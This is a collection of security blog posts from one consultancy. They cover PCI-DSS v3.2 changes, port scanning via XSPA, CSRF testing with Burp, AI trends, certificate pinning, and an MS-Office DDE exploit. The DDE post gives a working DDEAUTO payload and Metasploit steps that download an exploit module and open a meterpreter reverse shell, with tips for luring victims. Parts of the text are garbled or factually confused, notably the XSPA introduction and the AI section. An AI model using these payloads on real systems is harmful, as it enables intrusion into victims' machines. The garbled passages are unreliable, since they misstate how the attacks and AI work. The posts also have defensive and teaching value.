INTRODUCTION & CHANGES IN PCI-DSS v3.2

INTRODUCTION & CHANGES IN PCI-DSS V3.2

The Payment Card Industry Data Security Standard (PCI- DSS) was developed to follow the policy and standards of cardholder data security which consistent data security measures globally. PCI- DSS provides a minimum of technical and operational requirements to protect data of the cardholders. PCI -DSS applies to all operation which involved in payment card processing of cardholder data.

The below describes the changes in PCI-DSS v3.2 from version 3.1.

AREAS EMPHASISED IN V3.2:

• CHANGE MANAGEMENT PROCESS:

  • The Change Management Process is done to perform the secure changes during the process based on the business requirement.

• ADMINISTRATIVE ACCESSING:

  • The Administrative privilege is given only to the single user were the particular can gain the read, write and execute access to the changes in the environment.

• INCIDENT RESPONSE:

  • Incident response is nothing but when there is an issue raised in the environment the action is taken based on the severity of the problems.

• E-COMMERCE – A-EP ENVIRONMENTS:

  • the “Expected Testing” column is based on the testing procedures in the PCI DSS and provides a high-level description of the types of testing activities should be performed to verify that a requirement has met.

SAQ VERSION	# QUESTIONS V3.1	# QUESTIONS V3.2	DIFFERENCE
SAQ D-SP	347	369	+22
SAQ D-MER	326	331	+5
SAQ C	139	162	+23
SAQ A-EP	139	193	+54
SAQ B-IP	83	84	+1
SAQ C-VT	73	80	+7
SAQ B	41	41	0
SAQ P2PE-HW	35	33	-2
SAQ A	14	22	+8

MASKING THE PAN NUMBER

• DISPLAYING THE PRIMARY ACCOUNT NUMBER

  • First six and last four digits of PAN can be displayed based on the current requirement.

For a legitimate business need the pan number must be encrypted. Follow Requirement 3.3 for further reference.

CHANGE CONTROL

• CHANGES IN CHANGE CONTROL IN V3.2

  • Maintain proper documentation when any change control issued.
  • Implement all the necessary control in all the new and existing systems or devices.
  • Change control processes must include verification of PCI DSS requirements impacted by a (significant) change. Fallow Requirement 6.4.6 which is effective from Feb 1, 2018.

HIGH-RISK VULNERABILITY MANAGEMENT

• INTEGRATE VULNERABILITIES INTO THE RISK ASSESSMENT PROCESS

  • Ensure all “high risk” vulnerabilities must be addressed for internal scans and resolved.
  • By the vulnerability ranking as per Requirement 6.1 and 6.2 in PCI-DSS scope.
  • After resolving the vulnerabilities ensure the risk has been cleared by rescanning.

REMOTE ADMINISTRATOR ACCESS TO CDE

• ANY NON-CONSOLE ADMINISTRATOR ACCESS TO CDE

  • All the non-console access into CDE for personnel with administrative access must implement the multi-factor authentication.
  • The current requirement for multi-factor authentication for remote access to CDE for personnel with administrative access still applies according to the PCI-DSS scope.
  • Fallow PCI-DSS scope 8.3.1 and 8.3.2 mandatorily from Jan 31, 2018.

RESOURCE

• Refer the following document for the PCI-DSS scope.
• LINK: pcisecuritystandards.org/document_library?category=pcidss

AUTHOR

Dharmesh B

Security Engineer

Briskinfosec Technology and Consulting Pvt Ltd.,

https://www.linkedin.com/in/dharmeshbaskaran/

Cross Site Port Attack (XSPA)

 

CROSS SITE PORT ATTACK (XSPA)

INTRODUCTION:

A web application is helpless against Cross Site Port Attack if it forms client provided URLs and does not disinfect the backend reaction got from remote servers previously sending it back to the client. The responses, in specific cases, can be concentrated to distinguish benefit accessibility (port status, flags and so forth.) and even bring information from remote administrations in unique ways.

Detecting a potential XSPA vulnerability is very simple and if the web app takes URL as input and tries to make it connect to the port and analyse the output and I have been attempting this XSPA attack on a testing app http://testphp.vulnweb.com/

Once I visited the testing site, and here I have selected the image categories option on the site as follows

Later I have selected the required image file it takes me to the URL as follow

Once I Visited this site I have started to capture the backend response using Burp Suite tool

Burp Suite is a graphical tool for testing Web application security, and It was mainly developed to provide a comprehensive solution for web application security checks. and In addition to this basic functionality, it also has some extra features such as proxy server, scanner and intruder, the tool also contains more advanced options such as a spider, a repeater, a decoder, a comparer, an extender and a sequencer

I have cross checked this site using my localhost with some ports and captured the response in burp suite, and by this method, we can precisely analyse the response for each port

Here I have captured the response of the image URL and crossed check it with my localhost with port 80(HTTP), and I can see the response 200 OK (Normal response)

Once It fetches the average result, and you can also confirm this for other ports like 22(ssh), 21(ftp), 25(SMTP), 8080(https) etc. and you can check the result in browser as well.

During Port analysis, if any required port is closed, it fetches the result as

It also shows the response of 200, but it displays some warning like (failed to open) or connection refused etc. and if it shows this case of errors then you can confirm that the port is closed

In the above screenshot shows the different case of the port is opened but it shows the result without exposing the attacker IP on the server logs and it also reveals the backend service running on SSH

MITIGATION FOR XSPA ATTACK:

• Unauthorized URL’s access should be restricted
• Restrict Connectivity to the internal ports
• Whitelist IP address
• Disable Unwanted protocols and services.
• You can block your ports using firewall for better security please check the link below to block your inernal ports

Reference Link:

http://www.thewindowsclub.com/block-open-port-windows-8-firewall

CONCLUSION:

XSPA vulnerability attack mainly used to perform port scanning of a target using another vulnerable website and also an attacker can perform a DOS attack, Code Execution and other major attacks on other vulnerable  websites

Reference Link:

https://teamultimate.in/cross-site-port-attack-xspa-tutorial/

http://indiatriks.blogspot.in/2012/07/xspa-cross-site-port-attack.html

AUTHOR

RamKumar G

SecurityEngineer

BriskInfoSec Technology and Consulting PVT LTD

Find  me @ https://www.linkedin.com/in/ram-kumar-3439b511a/

How serious is Cross-site request forgery (XSRF or CSRF)?

 27 Dec 2017 Brisk Blogs BINT LAB

HOW SERIOUS IS CROSS-SITE REQUEST FORGERY (XSRF OR CSRF)?

Cross-site request forgery is attacking website as a legitimate and trusted user that tricks the victim submitting a malicious request. An attacker may forge a request to log the victim into a target website  CSRF, this could even lead to further damage.

The attacker often takes advantage of the fact that the user is already authenticated, but with some types of this attack. Impacts of successful CSRF exploits vary greatly based on the privileges of each victim. When targeting a normal user, a successful CSRF attack can compromise end-user data and their associated functions. Utilizing social engineering, an attacker can embed malicious HTML or JavaScript code into an email or website to request a specific ‘task URL’. The task then executes with or without the user’s knowledge, either directly or by utilizing a Cross-Site Scripting flaw  It is imperative that no XSS vulnerabilities are present to ensure that CSRF defenses can’t be circumvented

As a webmaster, however, you should not assume that you are protected from CSRF attacks when you see anti-CSRF tokens used in your web applications.

BURP SUITE:

Burp Suite is an integrated platform for performing security testing of web applications Burp to test the security of their applications. Some of Burp’s more advanced features will take further learning and experience to master It is not a point-and-click tool but is designed to be used by hands-on testers to support the testing process.

It was developed to provide a comprehensive solution for web application security checks. In addition to basic functionality, such as proxy server, scanner and intruder, the tool also contains more advanced options such as a spider, a repeater, a decoder, a comparer, an extender and a sequencer A penetration tester configures their Internet browser to route traffic through the proxy which then acts as a sort of Man In The Middle by capturing and analyzing each request and response to and from the target web application.

Step: 1 Here how to test CSRF test manually configure burp suite with your browser

Step: 2 Take authenticated web application Testing Site  You can log in using the credentials test:test.

Step 3: Then value in the field you can change the name email ID PH: NO Example Name Open Burp Proxy open the Tab Intercept On

Step: 4 Update the filed Submit the request so that it is captured  Burp Proxy  the Raw

Step: 5 Right Click Go to Engagement tools Generate CSRF PoC Option

Step : 6 PoC Generated Copy the HTML Open Note pad paste the HTML

Step:7 Modified the data As Test Username Email ID abc@gmail.com

Step: 8 Then Save It has test.html Open another browser login the Test site as test user click and Open the Test.html file submit the request

Step: 9 Attack has been successfully accounting information has been changed serves as an initial check to verify whether the attack is possible web application has been altered. A successful attack shows that the web application is vulnerable to CSRF

Cross-site request forgery is an understated attack technique that can be exceedingly deadly. In some cases it can lead to the complete compromise of a web-based system. We at BriskInfosec take care of the complete   web application security   testing helping the developers to develop their website and application in a secure manner.

For further information please feel free to get in touch with us @ Contact@briskinfosec.com

AUTHOR

Surya

Security Engineer

BriskInfosec Technology and consulting PVT LTD

Follow me @ https://www.linkedin.com/in/surya-shiva-43284b137/

TOP ARTIFICIAL INTELLIGENCE TRENDS IN CYBER SECURITY

TOP ARTIFICIAL INTELLIGENCE TRENDS IN CYBER SECURITY

Artificial intelligent is defined as the study of intelligent agent and devices that perceives the environment around and takes some actions for its chance of success at some goals and it also plays an important role in all fields AI robots are one of the major invention in recent years it takes the actions, control and activities of human environment and replicates the same and AI can encompass anything from google search algorithm

In Today’s Artificial Intelligence made to perform a narrow task it’s meant to drive a car by its own but when compared to narrow AI Many researches plan to create a general (AGI or strong AI) because the narrow AI can perform each and every task of the human and it may also lead to some dangerous activities it plays a major drawback on creating a narrow AI

ADVANTAGES OF ARTIFICIAL INTELLIGENCE:

Artificial Intelligence is used in a complicate mixture of computer science, Mathematics and other complex sciences major advantage of artificial intelligence as follows

• Error Reduction
• Difficult Exploration
• Daily Application
• Digital Assistance
• Repetitive jobs
• Medical Application
• No Break

ERROR REDUCTION:

It is mainly used to detect and minimize the errors and also executes the result at higher accuracy and AI helps us to study about the concept involved in the exploration of space and AI created robots are used to transfer information across the space and robots transfers the information’s to the space are highly secured and they cannot be modified or copied by a normal human

DIFFICULT EXPLORATION:

It involves the science of robots, process of mining and other fuel exploration purposes and it acts not only in the complex behavior but also in the exploration of space due to its programming ability it can performs the process more than human’s behavior

In Mining AI places an important role to detect the exact place for digging to find out the non-artificial products like the coal, gold, silver and research made by the Goldcorp team up with the IBM Watson to develop an advanced feature by AI to find out the Non Artificial product locations

Reference Link: https://www.techemergence.com/ai-in-mining-mineral-exploration-autonomous-drills/

DAILY APPLICATION:

Computed Methods for Automated testing, Learning, reasoning and our other daily activities lies under AI. Cortana and Siri are used as a Virtual Search engine to help us out, tracking software like Map and cab booking are worked under GPS. Smartphone are on the perfect example for artificial intelligence, security chips placed in the ATM card follows AI to secure themselves from fraud

DIGITAL ASSISTANCE:

Highly advanced Organization used ‘avatar’ to minimize the work of humans and interacts with the clients and performs the task based on their requirements and many peoples started to use the robots in hotel for serving purpose and google lens is an another advanced method to connect with internet without the authentication process

REPETITIVE JOBS:

Repetitive jobs are monotonous in nature and it can be used in the purpose of machine intelligence and the machine thinks faster than humans in our life Machine Intelligence can assigned to perform some dangerous tasks because we can set some parameters for robots to perform their action it process the working methods in a secured manner and executes a better results than humans, Play Station is one of the best example when we are playing the one component is user and the another component is the AI and it capture the movement of the user and displays the same actions on the screen

MEDICAL APPLICATION:

In Medical field Doctor’s assess the patient and their health risk by the method of artificial intelligence and it guides the patient to be aware from medicine side effects, it finds a huge application in detecting and finding the neurological disorders and it capture the actions performed by the brain and nowadays in medical application it’s been developed to the digital body scanning (to scan over your whole body) in an automated manner.

Reference Link: https://www.youtube.com/watch?v=DCtAxUB1bvI

NO BREAK:

Machines unlike humans do not requires frequents break and refreshments they are performed for long hours and can continuously perform without getting bored or distracted or even tired

DISADVANTAGES OF ARTIFICIAL INTELLIGENCE

• High Cost
• No Replicating humans
• No improvement with experience
• Unemployment

HIGH COST:

Creation of the Artificial Intelligence machines or robots charges high cost when compared to the other automated machines and the repair and maintenance require high cost and AI also needs some upgrades to develop its level day by day and when the AI machine gets breakdown or any maintenance report leads to high cost to recover the codes (or) to repair the machine so it considered to be the major drawback of Artificial Intelligence

NO REPLICATING HUMANS:

Machine do not have emotions it leads to the drawback of AI because at certain situations they do not know to take the correct decisions at a specific time. The either perform incorrectly or breakdown in such situations

NO IMPROVEMENT WITH EXPERIENCE:

Unlike humans artificial intelligence cannot be calculates its experience based on its time they are different from humans and AI stores lots of data but it fails to access at time when it is needed and it does not any care or emotional feeling like human and it’s one of the drawback of AI from humans, they fail to distinguish between the hardworking individual and inefficient individual

UNEMPLOYMENT:

Replace of humans with machines lead to the large scale of unemployment and Unemployment is one of the most socially undesirable phenomenon and Humans are becoming lazy nowadays and they started to use machine to complete their work and this lead to the unemployment of many peoples and if humans starts thinking in a destructive way it leads to the create havoc with this machine, when artificial intelligence takes plays in a destructive way it leads to any kind of massive destructions in the world

ROLE OF AI IN CYBER SECURITY:

Machine Learning and artificial Intelligence plays an important role across industries and applications that has been used for computing power, data collections and analyzing against vulnerabilities etc.

By using AI we can perform any kinds of exploits and it detects the vulnerabilities in an easier and automated way in many cyber security organization’s employees were started to Learn AI and Machine Learning to develop their standards to next level in Artificial Intelligence

 TOP TRENDS IN CYBER SECURITY:

GDPR (GENERAL DATA PROTECTION REGULATION):

It’s mainly prepared for the European Union’s, of how to store your personal Data in a secured manner and it also mainly created for the EU Citizens because they are not complete with it and many Organization are expected to start GDPR for May.

AI AND MACHINE LEARNING ON CYBER DEFENSE:

AI and Machine learning plays an important role in cyber defense and machine learning modules detects the exact moves of the cyber security criminals and it helps the InfoSec professional’s in a greater way

HANDLING DATA BREACHES:

It’s impossible to eradicate data breaches completely and many organization’s started to control data breaches with some condition’s through monitoring IOT Devices to get control from DDOS attacks or misdirecting potential victim’s and failing to patch a known vulnerabilities and we can hope that the data’s could be  entirely controlled in the upcoming years

DEVELOPING A COMMON LANGUAGE:

There is a positive growth of development in cybersecurity realm and not least the creation and adoption of thing’s like NIST Cybersecurity framework and more cybersecurity experts and organization’s planning to develop a common language in the field of cybersecurity to make the process easier.

APPLICATION TESTING:

Application testing leads to the large amount of the data breaches because the security testing in application’s are not properly maintained and to control these everyone should put a  fresh efforts into patching and app testing in the coming year, and by this we would see a dramatic drop in data breaches.

ARTIFICIAL INTELLIGENCE TOOLS:

• Google Now
• Intelligent Personal Assistants
• Crystal knows
• Textio
• Enlitic
• Digital Genius
• TAMR
• Intraspexion
• Recorded Future
• Conversica

COMPANIES TRIES TO IMPROVE AI IN CYBER SECURITY:

AI FOCUS ON MALWARE:

AI Mainly focus on malware rather than exploits it checks for every suspicious file within the folder or checks by CPU instructions and or by API imports and AI can detect the malware by certain limitations in Memory or by I/O Operations and AI focus starts from the exploitation if any malware is sent to the computer it starts from the exploitation and later it can be passed through malicious shellcode can be passed through browser or by Microsoft office (or) Adobe Reader and finally in Malware AI Detection AI detects the malware by checking its memory level and by I/O operations Once they are not up to its level they are considered to be the malicious one.

After Malware detection AI can also be bypassed using AI Evasion techniques and by this process it redirects its way by detecting against AV and bypasses the malware detection on AI and here by using this techniques the AI fails to detects the malware and they are been explained as follows.

But Still Now AI Fails to detect the Zero Day Attacks and they are many methods are been developed on AI to detect advanced threats and Zero Day but it fails but the development on detecting Advanced level threats are going on in Progress

SUB INDUSTRY ARTIFICIAL INTELLIGENCE:

Artificial Intelligence statistics across every industries is been described in the above figure

BOOKS ON ARTIFICIAL INTELLIGENCE:

Reference Link: http://bigdata-madesimple.com/20-free-books-to-get-started-with-artificial-intelligence/

CONCLUSION:

As cyberattacks become more sophisticated, cybersecurity teams are tasked with adapting their technology to find new anomaliesOrganizations face millions of threats each day making is impossible for a security researcher to analyze and categorize them. This task can be done by using Machine Learning in an efficient way.

However, a more efficient cybersecurity process can help reduce costs and help streamline the process. Artificial intelligence and machine learning can rapidly and efficiently detect threats, resolve them, and prevent them in the shortest amount of time possible with the greatest potential for resolution.

AUTHOR

RamKumar

Security Engineer

BriskInfosec Technology and Consulting PVT LTD

Follow me @ https://www.linkedin.com/in/ram-kumar-3439b511a/

MAN IN THE MIDDLE ATTACK ON MOBILE APPLICATIONS

MAN IN THE MIDDLE ATTACK ON MOBILE APPLICATION BECOMES SERIOUS THREAT

WHAT IS MAN IN THE MIDDLE ATTACK?

Man in the middle attacks (MITM) is one of the attacks where the attacker interrupts between the sender and receiver and gathers the sensitive data. MITM attacks, which are a form of session hijacking are not new. However, what might not be known is that mobile devices are vulnerable to MITM attacks too. It is quite complex for the attacker to inject the MITM attack on mobile applications than on web applications.

HOW DOES A MAN-IN-THE-MIDDLE ATTACK WORK?

A man-in-the-middle attack (MITM) is like eavesdropping. Data is sent from point A (Mobile) to point B (server/website), and an attacker can get in-between these transmissions. They then set up tools programmed to “listen in” on transmissions, intercept data that is specifically targeted as valuable, and capture the data. Sometimes this data can be modified in the process of transmission to try to trick the end user to expose sensitive information, such as login credentials. Once the user has fallen into the trap, the data is collected from the target, and the original data is then forwarded to the planned destination unaltered.

MAN IN THE MIDDLE ATTACK ON MOBILE APPLICATIONS

For mobile apps to prevent these types of attacks it is important to look at how the mobile app performs authentication. Using certificate pinning within the mobile app helps ensure that the mobile app is communicating with the device it is expecting to communicate with.

TYPES OF MITM ATTACKS

• ARP Poisoning
• DNS Spoofing
• Port stealing
• Invisible Proxy
• Certificate Forgeing

In this blog, we will discuss the major attack (SSL PINNING)

SSL PINNING

Certificate pinning is hard-coding the certificate known to be used by the server in the mobile application. The app can then ignore the device’s trust store and rely on its own, and allow only SSL connections to hosts signed with certificates stored inside the application.

The client makes a connection to the server and the server responds with its SSL certificate. If that certificate was issued by a Certificate Authority that is trusted by the OS, then the connection is allowed.

 CERTIFICATE PINNING FOR ANDROID AND IOS APPS

When we, developers, are working in the development of any kind of software, we can’t forget about security. The minimum security measure we should use is HTTPS as the protocol to share information between a client (in this case, an Android/iOS app) and a server, followed by an updated cryptographic protocol like TLS 1.2 (SSL 3.0 is vulnerable!)

You may think that using an HTTPS is enough but in some cases like banking applications, where sensitive data may be sent between our client and our server, could be risky.

By default, when making a TLS connection, the client check two things:

• The server’s certificate matches the requested hostname.
• The server’s certificate has a chain of truth back to a trusted root certificate.

What it doesn’t do is check, if the certificate is the specific certificate you know your server is using, and that’s a possible security vulnerability, if the client is compromised and an unsafe certificate is installed(certificate forging), someone could do a man-in-the-middle attack.

Root CA, intermediate CA and Medium certificate

The solution to this problem is certificate pinning. Storing a certificate on our client application to ensure that any SSL request made matches the server’s certificate provided by a trusted CA (certificate authority). Let us see how to do it on both Android and iOS apps.

ANDROID

OkHttp lib provides a CertificatePinner class to be added to an OkHttpClient instance. The easiest way to pin a host is turned on pinning with a broken configuration and read the expected configuration when the connection fails.

CertificatePinner certificatePinner = new CertificatePinner.Builder()
          .add("mydomain.com", "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=")
          .build();
      OkHttpClient client = OkHttpClient.Builder()
          .certificatePinner(certificatePinner)
          .build();

After a request is executed, you’ll see this message on the console:

javax.net.ssl.SSLPeerUnverifiedException: Certificate pinning failure!
    Peer certificate chain:
      sha256/afwiKY3RxoMmLkuRW1l7QsPZTJPwDS2pdDROQjXw8ig=: CN=mydomain.com, OU=PositiveSSL
      sha256/klO23nT2ehFDXCfx3eHTDRESMz3asj1muO+4aIdjiuY=: CN=COMODO RSA Secure Server CA
      sha256/grX4Ta9HpZx6tSHkmCrvpApTQGo67CYDnvprLg5yRME=: CN=COMODO RSA Certification Authority
      sha256/lCppFqbkrlJ3EcVFAkeip0+44VaoJUymbnOaEUk7tEU=: CN=AddTrust External CA Root
    Pinned certificates for mydomain.com:
      sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    at okhttp3.CertificatePinner.check(CertificatePinner.java)
    at okhttp3.Connection.upgradeToTls(Connection.java)
    at okhttp3.Connection.connect(Connection.java)
    at okhttp3.Connection.connectAndSetOwner(Connection.java)

The exception will provide you the server’s certificate public key hashes. Paste them on the CertifinatePinner and done! Once the certificate pinner function is enabled in the Android app it will have protection against        SSL MITM attacks

CertificatePinner certificatePinner = new CertificatePinner.Builder()
        .add("mydomain.com", "sha256/afwiKY3RxoMmLkuRW1l7QsPZTJPwDS2pdDROQjXw8ig=")
        .add("mydomain.com", "sha256/klO23nT2ehFDXCfx3eHTDRESMz3asj1muO+4aIdjiuY=")
        .add("mydomain.com", "sha256/grX4Ta9HpZx6tSHkmCrvpApTQGo67CYDnvprLg5yRME=")
        .add("mydomain.com", "sha256/lCppFqbkrlJ3EcVFAkeip0+44VaoJUymbnOaEUk7tEU=")
        .build();

IOS

The iOS solution is not so straightforward because you need to store the certificate itself inside your app. In my case, I’ve used Alamofire as HTTP client lib for Swift.

First, you need to get the server’s certificate in .der format and add it to your iOS project.

openssl s_client -showcerts -server name mydomain.com -connect mydomain.com:443 </dev/null | openssl x509 -outform DER > mydomainCert.der

And now, let’s enable certificate pinning: to do it we need both ServerTrustPolicy and SessionManager objects. The first one will define the hostname and certificates that will be used in the process:

var serverTrustPolicies = [
     "mydomain.com": .pinCertificates(
     certificates: ServerTrustPolicy.certificates(),
     validateCertificateChain: true,
     validateHost: true
   ),
 ]

ServerTrustPolicy.certificates() will return all stored certificates and the booleans will validate the certificate chain and the hostname.

Lastly, create a SessionManager object using this trust policies:

var sessionManager = SessionManager(serverTrustPolicyManager: ServerTrustPolicyManager(policies: serverTrustPolicies!))

Done! Just use this sessionManager object to execute request

sessionManager.request(“https://mydomain.com/api”, method: .get, headers: headers)…

Conclusion:

Since MITM attacks are stealthier and it does not need any physical access to the victim device, a robust protection mechanism is required to prevent it. Hence SSL pinning is a much needed robust protection as it protects the application against MITM attacks by only allowing the connections to the server based on the trusted CA certificates.

MS-OFFICE DDE Code Execution Vulnerability

BEWARE OF MS-OFFICE DDE CODE EXECUTION VULNERABILITY

INTRODUCTION:

DDE (Dynamic Data Exchange) protocol is an inbuilt feature in Microsoft Windows Applications used for the exchange of dynamic data between the applications. DDE protocol sends messages between the applications that share data and uses shared memory to exchange data between applications.
There are many applications available which use DDE feature which includes MS-Word and office 365, visual basic etc..,

DDE VULNERABILITY AND CODE EXECUTION:

For Data transfer between the applications, DDE work by executing the application, that will provide the data. If an attacker can inject a malicious code inside the DDE object field of the application (In our example we use MS-word), the attacker can execute code within the word document or excel sheet. Another advantage for the attacker is, unlike other client-side code execution attacks that use a malicious doc file which when opened, prompts the victim to enable macros in order to run the malware, these DDE exploits don’t need the victim to enable macros feature in his ms-word application. When the malicious doc is opened, it simply throws an error dialog box to the victim, which most of the users will click ‘OK’ and they will ignore it. Hence there is a higher chance for the attackers to gain access to victim machine by using this vulnerability.

Since DDE is an inbuilt feature, the malicious document cannot be identified as a threat by any Anti-virus software or windows defender. This is another big advantage for the attacker and hackers.

In this article, we will look at a demo starting with a simple code execution example by using DDE vulnerability to a complete compromise of a victim system using Metasploit.

SIMPLE CODE EXECUTION IN MS-WORD:

In MS-Word (All versions are vulnerable), open a blank new document or we can use an existing document for legitimacy purpose which will be helpful for luring the victim to believe that the document is legitimate and trusted. For our example, I’m using a blank document.

In the blank document, go to insert tab → Quick parts → Field

Fig.1 Blank Document

In the Field dialog box, select Formula option to insert our DDE exploit code.

Fig.2 Insertion in Formula option

After that, you should see a Field inserted into the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes. we need to craft a DDE Object payload in the text field, which will start the malware or any code of our choice when the document is opened.

Fig.3

In the text field, insert the following code for executing notepad.exe when the document is opened.

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k notepad.exe"}

The DDEAUTO keyword is to inform Ms Word that this is a DDE field, and will auto execute when the document is opened, the second part is the full path of the executable to execute, and the last part between quotes are the arguments to pass to this executable (execute notepad.exe).

Fig.4

After that save the document as any name. Once the victim opens the doc, notepad.exe is executed after 2 error messages.

Fig.6

After these two errors, which most of the users will ignore, notepad gets executed without any macros.

Fig.7

In this way, an attacker can execute malicious code without any user interaction to take full system control.

SYSTEM COMPROMISE USING DDE EXPLOIT IN METASPLOIT:

Since the makers of Metasploit has not released the exploit in its update, we will get the exploit from outside and import it to Metasploit database. Download the exploit using command

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

After that just move the exploit dde_delivery.rb to use/share/Metasploit-framework/modules/exploit/windows directory. After that open msfconsole and reload the database using command reload_all.

After the exploit is loaded in Metasploit, we can use it to exploit our victim. In msfconsole set the below command parameters.

Use exploit/windows/dde_delivery
 set SRVHOST
 set payload windows/meterpreter/reverse_tcp
 set LHOST
 set LPORT
 exploit

Fig.8

Once we give the exploit command, it will generate a DDE exploit payload. We need to copy it paste it to the DDE formula field that is described in above example.

Fig.9

Save the document and send it to the victim. Once the victim opens the document and ignores the error, we will get the remote system access via meterpreter shell.

Fig.10

Once we get the shell, we can interact with sessions – I command.

Fig.11

In this way, attackers can compromise the system without any knowledge of users and also without triggering any alerts from the firewall. Microsoft has released some initial patches for this vulnerability.

MITIGATION FOR DDE VULNERABILITY:

1. Install windows security updates regularly.
2. Double the error messages while opening any msoffice documents instead of blindly clicking on OK button.
3. Do not open any unnecessary email attachments.
4. Use an up to date anti-virus and firewall software.
5. Disable DDE feature in windows registry by using the key

{HKEY_CURRENT_USER\Software\Microsoft\Office\\Excel\Security} workbooklinewarnings(DWORD)=2

Since DDE is a Microsoft’s genuine feature, most antivirus solutions do not flag any warning or block MS Office documents with DDE fields. The best way to protect yourself from such attacks is always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source.

RiskInfosec provides the world’s best security solutions. For Best Security Solutions reach us @ Contact@briskinfosec.com.

REFERENCES:

1) https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
2) https://technet.microsoft.com/en-us/library/security/4053440.aspx

AUTHOR

Dawood Ansar

Security Engineer

BriskInfosec Technology and consulting  PVT LTD

FInd me @https://www.linkedin.com/in/dawood-ansar-29403213b/